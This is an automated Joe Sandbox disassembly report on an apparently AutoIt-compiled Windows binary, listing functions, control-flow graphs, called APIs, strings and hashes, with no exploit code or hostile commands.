                                                                                                                    • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                    • Instruction ID: 47ed26fe5e4f14499a19266f33db37f620477d65c3665e56e98ef3faa181c862
                                                                                                                    • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                    • Instruction Fuzzy Hash: 93311B35A08B058EEB40EBA9F8547A87375FB55758F80003ACE8D13728DF7DE06487A0
                                                                                                                    Function 00007FF7BB827348 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 419 7ff7bb827348-7ff7bb8273ba call 7ff7bb827078 422 7ff7bb8273bc-7ff7bb8273c4 call 7ff7bb8155b4 419->422 423 7ff7bb8273d3-7ff7bb8273dd call 7ff7bb81e418 419->423 428 7ff7bb8273c7-7ff7bb8273ce call 7ff7bb8155d4 422->428 429 7ff7bb8273f7-7ff7bb827463 CreateFileW 423->429 430 7ff7bb8273df-7ff7bb8273f5 call 7ff7bb8155b4 call 7ff7bb8155d4 423->430 442 7ff7bb82771a-7ff7bb827736 428->442 433 7ff7bb827469-7ff7bb827470 429->433 434 7ff7bb8274eb-7ff7bb8274f6 GetFileType 429->434 430->428 439 7ff7bb8274b8-7ff7bb8274e6 GetLastError call 7ff7bb815564 433->439 440 7ff7bb827472-7ff7bb827476 433->440 436 7ff7bb8274f8-7ff7bb827533 GetLastError call 7ff7bb815564 CloseHandle 434->436 437 7ff7bb827549-7ff7bb82754f 434->437 436->428 453 7ff7bb827539-7ff7bb827544 call 7ff7bb8155d4 436->453 445 7ff7bb827551-7ff7bb827554 437->445 446 7ff7bb827556-7ff7bb827559 437->446 439->428 440->439 447 7ff7bb827478-7ff7bb8274b6 CreateFileW 440->447 451 7ff7bb82755e-7ff7bb8275ac call 7ff7bb81e334 445->451 446->451 452 7ff7bb82755b 446->452 447->434 447->439 457 7ff7bb8275ae-7ff7bb8275ba call 7ff7bb827284 451->457 458 7ff7bb8275c0-7ff7bb8275ea call 7ff7bb826de4 451->458 452->451 453->428 464 7ff7bb8275bc 457->464 465 7ff7bb8275ef-7ff7bb8275f9 call 7ff7bb8204b8 457->465 466 7ff7bb8275ec 458->466 467 7ff7bb8275fe-7ff7bb827643 458->467 464->458 465->442 466->465 469 7ff7bb827665-7ff7bb827671 467->469 470 7ff7bb827645-7ff7bb827649 467->470 473 7ff7bb827718 469->473 474 7ff7bb827677-7ff7bb82767b 469->474 470->469 472 7ff7bb82764b-7ff7bb827660 470->472 472->469 473->442 474->473 475 7ff7bb827681-7ff7bb8276c9 CloseHandle CreateFileW 474->475 476 7ff7bb8276cb-7ff7bb8276f9 GetLastError call 7ff7bb815564 call 7ff7bb81e548 475->476 477 7ff7bb8276fe-7ff7bb827713 475->477 476->477 477->473
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617910340-0
                                                                                                                    • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                    • Instruction ID: 2dbab09effdab0021803bc1465b15c2d330da59a4dbed4058fd0c92784f4f2e6
                                                                                                                    • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                    • Instruction Fuzzy Hash: 5CC1EE36B18A418AEB109F6DD4413AC7761FB5ABA8F401235CF2E5B7A8CF38E425C750
                                                                                                                    Function 00007FF7BB7F25BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 557 7ff7bb7f25bc-7ff7bb7f263d 561 7ff7bb7f2643-7ff7bb7f267c 557->561 562 7ff7bb7f287e-7ff7bb7f28af 557->562 563 7ff7bb7f2680-7ff7bb7f2687 561->563 565 7ff7bb7f2856-7ff7bb7f2876 563->565 566 7ff7bb7f268d-7ff7bb7f26a1 563->566 565->562 568 7ff7bb83d148-7ff7bb83d14f 566->568 569 7ff7bb7f26a7-7ff7bb7f26bc 566->569 570 7ff7bb7f2702-7ff7bb7f2723 568->570 571 7ff7bb83d155 568->571 572 7ff7bb7f26c2-7ff7bb7f26c9 569->572 573 7ff7bb7f29c8-7ff7bb7f29eb PeekMessageW 569->573 589 7ff7bb7f2725-7ff7bb7f272c 570->589 590 7ff7bb7f276e-7ff7bb7f27d2 570->590 578 7ff7bb83d15a-7ff7bb83d160 571->578 572->573 576 7ff7bb7f26cf-7ff7bb7f26d4 572->576 574 7ff7bb7f29f1-7ff7bb7f29f5 573->574 575 7ff7bb7f26e8-7ff7bb7f26ef 573->575 579 7ff7bb83d1aa-7ff7bb83d1bb 574->579 580 7ff7bb7f29fb-7ff7bb7f2a05 574->580 582 7ff7bb7f26f5-7ff7bb7f26fc 575->582 583 7ff7bb83e285-7ff7bb83e293 575->583 576->573 581 7ff7bb7f26da-7ff7bb7f26e2 GetInputState 576->581 585 7ff7bb83d19b 578->585 586 7ff7bb83d162-7ff7bb83d176 578->586 579->575 580->578 587 7ff7bb7f2a0b-7ff7bb7f2a1d call 7ff7bb802de8 580->587 581->573 581->575 582->570 588 7ff7bb83e29d-7ff7bb83e2b5 call 7ff7bb7ff1c4 582->588 583->588 585->579 586->585 591 7ff7bb83d178-7ff7bb83d17f 586->591 603 7ff7bb7f2a33-7ff7bb7f2a4f PeekMessageW 587->603 604 7ff7bb7f2a1f-7ff7bb7f2a2d TranslateMessage DispatchMessageW 587->604 588->565 589->590 595 7ff7bb7f272e-7ff7bb7f2738 589->595 625 7ff7bb83e276 590->625 626 7ff7bb7f27d8-7ff7bb7f27da 590->626 591->585 596 7ff7bb83d181-7ff7bb83d190 TranslateAcceleratorW 591->596 600 7ff7bb7f273f-7ff7bb7f2742 595->600 596->587 601 7ff7bb83d196 596->601 605 7ff7bb7f28b0-7ff7bb7f28b7 600->605 606 7ff7bb7f2748 600->606 601->603 603->575 610 7ff7bb7f2a55 603->610 604->603 608 7ff7bb7f28eb-7ff7bb7f28ef 605->608 609 7ff7bb7f28b9-7ff7bb7f28cc timeGetTime 605->609 607 7ff7bb7f274f-7ff7bb7f2752 606->607 613 7ff7bb7f28f4-7ff7bb7f28fb 607->613 614 7ff7bb7f2758-7ff7bb7f2761 607->614 608->600 615 7ff7bb7f28d2-7ff7bb7f28d7 609->615 616 7ff7bb83d2ab-7ff7bb83d2b0 609->616 610->574 623 7ff7bb83d2f8-7ff7bb83d303 613->623 624 7ff7bb7f2901-7ff7bb7f2905 613->624 618 7ff7bb83d4c7-7ff7bb83d4ce 614->618 619 7ff7bb7f2767 614->619 620 7ff7bb7f28dc-7ff7bb7f28e5 615->620 621 7ff7bb7f28d9 615->621 616->620 622 7ff7bb83d2b6 616->622 619->590 620->608 629 7ff7bb83d2bb-7ff7bb83d2f3 timeGetTime call 7ff7bb802ac0 call 7ff7bb863a28 620->629 621->620 622->629 627 7ff7bb83d309-7ff7bb83d30c 623->627 628 7ff7bb83d305 623->628 624->607 625->583 626->625 630 7ff7bb7f27e0-7ff7bb7f27ee 626->630 631 7ff7bb83d30e 627->631 632 7ff7bb83d312-7ff7bb83d319 627->632 628->627 629->608 630->625 634 7ff7bb7f27f4-7ff7bb7f2819 630->634 631->632 635 7ff7bb83d31b 632->635 636 7ff7bb83d322-7ff7bb83d329 632->636 639 7ff7bb7f281f-7ff7bb7f2829 call 7ff7bb7f2b70 634->639 640 7ff7bb7f290a-7ff7bb7f290d 634->640 635->636 641 7ff7bb83d32b 636->641 642 7ff7bb83d332-7ff7bb83d33d call 7ff7bb8042a0 636->642 651 7ff7bb7f282e-7ff7bb7f2836 639->651 644 7ff7bb7f2931-7ff7bb7f2933 640->644 645 7ff7bb7f290f-7ff7bb7f291a call 7ff7bb7f2e30 640->645 641->642 642->606 642->618 649 7ff7bb7f2935-7ff7bb7f2949 call 7ff7bb7f66c0 644->649 650 7ff7bb7f2971-7ff7bb7f2974 644->650 645->651 659 7ff7bb7f294e-7ff7bb7f2950 649->659 657 7ff7bb83dfbe-7ff7bb83dfc0 650->657 658 7ff7bb7f297a-7ff7bb7f2997 call 7ff7bb7f01a0 650->658 655 7ff7bb7f299e-7ff7bb7f29ab 651->655 656 7ff7bb7f283c 651->656 662 7ff7bb7f29b1-7ff7bb7f29be call 7ff7bb804c24 655->662 663 7ff7bb83e181-7ff7bb83e197 call 7ff7bb804c24 * 2 655->663 660 7ff7bb7f2840-7ff7bb7f2843 656->660 664 7ff7bb83dfed-7ff7bb83dff6 657->664 665 7ff7bb83dfc2-7ff7bb83dfc5 657->665 673 7ff7bb7f299c 658->673 659->651 670 7ff7bb7f2956-7ff7bb7f2966 659->670 671 7ff7bb7f2849-7ff7bb7f2850 660->671 672 7ff7bb7f2b17-7ff7bb7f2b1d 660->672 662->573 663->625 668 7ff7bb83dff8-7ff7bb83e003 664->668 669 7ff7bb83e005-7ff7bb83e00c 664->669 665->660 667 7ff7bb83dfcb-7ff7bb83dfe7 call 7ff7bb7f3c20 665->667 667->664 678 7ff7bb83e00f-7ff7bb83e016 call 7ff7bb878b98 668->678 669->678 670->651 679 7ff7bb7f296c 670->679 671->563 671->565 672->671 680 7ff7bb7f2b23-7ff7bb7f2b2d 672->680 673->659 689 7ff7bb83e0d7-7ff7bb83e0d9 678->689 690 7ff7bb83e01c-7ff7bb83e036 call 7ff7bb8634e4 678->690 684 7ff7bb83e0f4-7ff7bb83e10e call 7ff7bb8634e4 679->684 680->568 691 7ff7bb83e147-7ff7bb83e14e 684->691 692 7ff7bb83e110-7ff7bb83e11d 684->692 693 7ff7bb83e0db 689->693 694 7ff7bb83e0df-7ff7bb83e0ee call 7ff7bb87a320 689->694 705 7ff7bb83e038-7ff7bb83e045 690->705 706 7ff7bb83e06f-7ff7bb83e076 690->706 691->671 698 7ff7bb83e154-7ff7bb83e15a 691->698 696 7ff7bb83e11f-7ff7bb83e130 call 7ff7bb804c24 * 2 692->696 697 7ff7bb83e135-7ff7bb83e142 call 7ff7bb804c24 692->697 693->694 694->684 696->697 697->691 698->671 703 7ff7bb83e160-7ff7bb83e169 698->703 703->663 710 7ff7bb83e047-7ff7bb83e058 call 7ff7bb804c24 * 2 705->710 711 7ff7bb83e05d-7ff7bb83e06a call 7ff7bb804c24 705->711 706->671 708 7ff7bb83e07c-7ff7bb83e082 706->708 708->671 714 7ff7bb83e088-7ff7bb83e091 708->714 710->711 711->706 714->689
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3249950245-0
                                                                                                                    • Opcode ID: c8d44295f0387fdbfff5ef6264fc501ae10a05964bf363e687d087dd754412c7
                                                                                                                    • Instruction ID: 1e65935b8ad11ffed3629e28bb17c4a9286eb4d72f71c09bd8675e415449a319
                                                                                                                    • Opcode Fuzzy Hash: c8d44295f0387fdbfff5ef6264fc501ae10a05964bf363e687d087dd754412c7
                                                                                                                    • Instruction Fuzzy Hash: 1F22B332A0CA8286EB64AB2CD4503B9A7A1FB66744F940136EF4D436B9CF3CF455C764
                                                                                                                    Function 00007FF7BB7E3CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 849 7ff7bb7e3cbc-7ff7bb7e3d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$Show
                                                                                                                    • String ID: AutoIt v3$d$edit
                                                                                                                    • API String ID: 2813641753-2600919596
                                                                                                                    • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                    • Instruction ID: 2ec264343040634dc63fbc03f11136ecc5b0c4540d5690857c69a1a975856a02
                                                                                                                    • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                    • Instruction Fuzzy Hash: 8921A132A2CB418BEB10DB28F45872DB3A0F75A798F905239DB8D06668CF7DD054CB50
                                                                                                                    Function 00007FF7BB7E7EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802D8E
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802D9C
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802DAC
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802DBC
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802DCA
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802DD8
                                                                                                                      • Part of subcall function 00007FF7BB7FEEC8: RegisterWindowMessageW.USER32 ref: 00007FF7BB7FEF76
                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB7E106D), ref: 00007FF7BB7E8209
                                                                                                                    • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB7E106D), ref: 00007FF7BB7E828F
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB7E106D), ref: 00007FF7BB82D36A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID: AutoIt
                                                                                                                    • API String ID: 1986988660-2515660138
                                                                                                                    • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                    • Instruction ID: 3fdc700f8680c590c6742ef2155c42ec9fcafa023a52c1b7b5dbe945607db9ce
                                                                                                                    • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                    • Instruction Fuzzy Hash: 8FC1C661D19B4A89E640AB1CE860078B7A8FFB6350FD0123BDE5D42679DF7CA161C7E0
                                                                                                                    Function 00007FF7BB7E72C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3135491444-1585850449
                                                                                                                    • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                    • Instruction ID: 7e949b700c518b90b847b6bd40ada9e3ea95a94e46ea2fb675e8e29e6aec46bc
                                                                                                                    • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                    • Instruction Fuzzy Hash: F5414122A0868696E760FB6CD4402B9A365FF6A348FC45036DF4C426BDDF7CE554C7A0
                                                                                                                    Function 00007FF7BB7E3F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetOpenFileNameW.COMDLG32 ref: 00007FF7BB82BAA2
                                                                                                                      • Part of subcall function 00007FF7BB7E56D4: GetFullPathNameW.KERNEL32(?,00007FF7BB7E56C1,?,00007FF7BB7E7A0C,?,?,?,00007FF7BB7E109E), ref: 00007FF7BB7E56FF
                                                                                                                      • Part of subcall function 00007FF7BB7E3EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7BB7E3ED8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                    • API String ID: 779396738-2360590182
                                                                                                                    • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                                    • Instruction ID: f311339b222627e695b6f19b7aa416fa4d78327da24cac9fba8d16a93219aec7
                                                                                                                    • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                                    • Instruction Fuzzy Hash: 0131D032608B8189E710EF29E8401ACB7A8FB5AB84F944136EF8C03B69CF3CD155C750
                                                                                                                    Function 00007FF7BB804610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3812282468-0
                                                                                                                    • Opcode ID: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                                                                    • Instruction ID: d618f40490eae7504596b95d27ffd54618a32a678941a4c1db19001f5978374a
                                                                                                                    • Opcode Fuzzy Hash: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                                                                    • Instruction Fuzzy Hash: 9B31A322A097818AEB219B2D90502A9A798F756BC8F984036DF4C0B76DCE3CD558C7A0
                                                                                                                    Function 00007FF7BB7E6F60 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7BB7E6F52,?,?,?,?,?,?,00007FF7BB7E782C), ref: 00007FF7BB7E6FA5
                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7BB7E6F52,?,?,?,?,?,?,00007FF7BB7E782C), ref: 00007FF7BB7E6FD3
                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7BB7E6F52,?,?,?,?,?,?,00007FF7BB7E782C), ref: 00007FF7BB7E6FFA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                                    • Instruction ID: b4f7828c7bc6bb2032035ccb9f05552c60deeb8a3b4f397e50059ce88b59c432
                                                                                                                    • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                                    • Instruction Fuzzy Hash: 11218E33A1878187D7109F6DE44496EB3A8FB69B84B841131DB8D83B28DF39E414CB50
                                                                                                                    Function 00007FF7BB809118 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                                    • Instruction ID: 542acd1c647d568f62e0f91c825db57ce1d8106f7b8686c72307db724ed72f64
                                                                                                                    • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                                    • Instruction Fuzzy Hash: 26E0ED20B0830182EF047B7D9C493B563927FAA781F805038CE4A063BACD2DE42882A0
                                                                                                                    Function 00007FF7BB7F66C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
